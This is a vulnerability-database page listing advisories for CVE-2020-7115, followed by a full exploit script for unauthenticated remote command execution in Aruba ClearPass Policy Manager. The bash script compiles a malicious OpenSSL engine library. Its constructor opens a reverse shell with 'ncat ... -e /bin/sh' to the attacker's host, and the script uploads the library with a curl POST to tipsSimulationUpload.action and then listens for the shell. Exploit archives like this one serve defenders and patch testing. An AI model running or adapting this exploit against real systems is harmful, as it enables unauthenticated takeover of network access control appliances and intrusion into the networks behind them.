| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| ClearPass Policy Manager Unauthenticated Remote Command Execution Exploit | 8 Jul 202000:00 | – | zdt | |
| Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution Exploit | 10 Jul 202000:00 | – | zdt | |
| CVE-2020-7115 | 3 Jun 202000:00 | – | attackerkb | |
| Aruba Networks ClearPass Policy Manager 6.7.x < 6.7.13-HF / 6.8.x < 6.8.5-HF / 6.9.x < 6.9.1 Multiple Vulnerabilities (ARUBA-PSA-2020-005) | 17 Jul 202000:00 | – | nessus | |
| CVE-2020-7115 | 9 Oct 202013:36 | – | circl | |
| Aruba Networks ClearPass Policy Manager Access Control Error Vulnerability | 4 Jun 202000:00 | – | cnvd | |
| Aruba Networks ClearPass Policy Manager Remote Code Execution (CVE-2020-7115) | 23 May 202100:00 | – | checkpoint_advisories | |
| CVE-2020-7115 | 3 Jun 202012:43 | – | cve | |
| CVE-2020-7115 | 3 Jun 202012:43 | – | cvelist | |
| CVE-2020-7115 | 3 Jun 202013:15 | – | nvd |
# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Date: 2020-07-06
# Exploit Author: SpicyItalian
# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/
# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1
# Tested on: ClearPass 6.7.0
# CVE: CVE-2020-7115
Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.
#!/usr/bin/env bash
if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
exit 0
fi
cat <<EOF >>payload.c
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF
gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o
curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &
cat <<"EOF"
/(\
¡ !´\
| )\ `.
| `.) \,-,--
( / /
`'-.,;_/
`----
EOF
printf "\nPleasea waita for your spicy shell...\n\n"
ncat -v -l $3 $4Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation